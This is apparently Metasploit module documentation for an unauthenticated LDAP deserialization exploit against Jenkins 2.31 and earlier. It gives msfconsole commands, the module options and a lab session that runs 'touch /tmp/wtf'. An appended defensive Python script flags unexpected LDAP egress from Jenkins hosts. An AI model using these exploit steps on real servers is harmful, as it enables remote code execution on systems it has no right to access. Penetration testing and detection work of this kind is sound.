documentation/modules/exploit/linux/misc/jenkins_ldap_deserialize.md
Jenkins 2.31 or below is vulnerable and can be downloaded from updates.jenkins-ci.org
Exploitation does not require authentication; only HTTP access to the vulnerable application is required.
java -jar jenkins.war
msfconsole
use exploit/linux/misc/jenkins_ldap_deserialize
set RHOST [target host]
set PAYLOAD cmd/unix/generic
set CMD 'touch /tmp/wtf'
run
RHOST
The address of the Jenkins server.
The HTTP port for the Jenkins server. (Defaults to 8080)
The path to the target instance of Jenkins. (Defaults to /)
The local address to listen for the LDAP request on. (Defaults to 127.0.0.1)
The local port to listen for the LDAP request on. (Defaults to 1389)
The LDAP host the exploit will connect to. Can be different from SRVHOST in an environment where there is port forwarding. (Defaults to 127.0.0.1)
Example usage against a unix target running Jenkins 2.31.
msf > use exploit/linux/misc/jenkins_ldap_deserialize
msf exploit(jenkins_ldap_deserialize) > set TARGETURI /
TARGETURI => /
msf exploit(jenkins_ldap_deserialize) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf exploit(jenkins_ldap_deserialize) > set RPORT 8080
RPORT => 8080
msf exploit(jenkins_ldap_deserialize) > set PAYLOAD cmd/unix/generic
PAYLOAD => cmd/unix/generic
msf exploit(jenkins_ldap_deserialize) > set CMD 'touch /tmp/wtf'
CMD => touch /tmp/wtf
msf exploit(jenkins_ldap_deserialize) > run
[*] Exploit completed, but no session was created.
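From the defender's side, the LDAP request described in the options above (the Jenkins server connecting out to the LDAP host, port 1389 by default) appears as unexpected egress from the Jenkins host. The following is an added example, not part of the module or its documentation; the host addresses, the egress allowlist and the log-line format are assumptions constructed for illustration.

```python
import ipaddress
import re

# Assumptions (constructed, not from the module documentation):
JENKINS_HOSTS = {"10.0.5.20"}                      # hosts running Jenkins
ALLOWED_EGRESS = {("10.0.1.10", 389), ("10.0.1.10", 636), ("10.0.2.30", 443)}
LDAP_PORTS = {389, 636, 1389}                      # 1389 is the listener default on this page

# Hypothetical flow-log format: "<ts> <proto> <src>:<sport> -> <dst>:<dport> <state>"
IPV4 = r"\d{1,3}(?:\.\d{1,3}){3}"
LINE_RE = re.compile(
    rf"^(?P<ts>\S+) (?:tcp|udp) (?P<src>{IPV4}):\d+ -> "
    rf"(?P<dst>{IPV4}):(?P<dport>\d+) (?P<state>\S+)$"
)

def parse(line):
    """Return (ts, src, dst, dport, state) or None for malformed lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    try:
        src = str(ipaddress.ip_address(m["src"]))
        dst = str(ipaddress.ip_address(m["dst"]))
    except ValueError:
        return None
    return m["ts"], src, dst, int(m["dport"]), m["state"]

def unexpected_egress(lines):
    """Flag new outbound connections from Jenkins hosts that are not allowlisted.

    The listener port is configurable, so matching on port alone is not enough:
    any non-allowlisted destination is reported, and LDAP ports are labelled.
    """
    hits = []
    for line in lines:
        flow = parse(line)
        if flow is None:
            continue
        ts, src, dst, dport, state = flow
        if src not in JENKINS_HOSTS or state != "NEW":
            continue
        if (dst, dport) in ALLOWED_EGRESS:
            continue
        reason = "ldap-port" if dport in LDAP_PORTS else "unlisted-destination"
        hits.append((ts, dst, dport, reason))
    return hits

SAMPLE_LOG = [  # constructed sample lines
    "2017-01-10T09:00:01Z tcp 10.0.5.20:41000 -> 10.0.1.10:389 NEW",
    "2017-01-10T09:00:05Z tcp 10.0.5.20:41002 -> 203.0.113.7:1389 NEW",
    "2017-01-10T09:00:09Z tcp 10.0.5.20:41004 -> 203.0.113.7:8443 NEW",
    "2017-01-10T09:00:11Z tcp 10.0.9.9:50000 -> 203.0.113.7:1389 NEW",
    "2017-01-10T09:00:12Z tcp 10.0.5.20:41002 -> 203.0.113.7:1389 ESTABLISHED",
    "not a flow record",
]
```

Calling `unexpected_egress(SAMPLE_LOG)` reports the two new connections from the Jenkins host to the non-allowlisted address and ignores the legitimate directory lookup, the other host, the already-established flow and the malformed line.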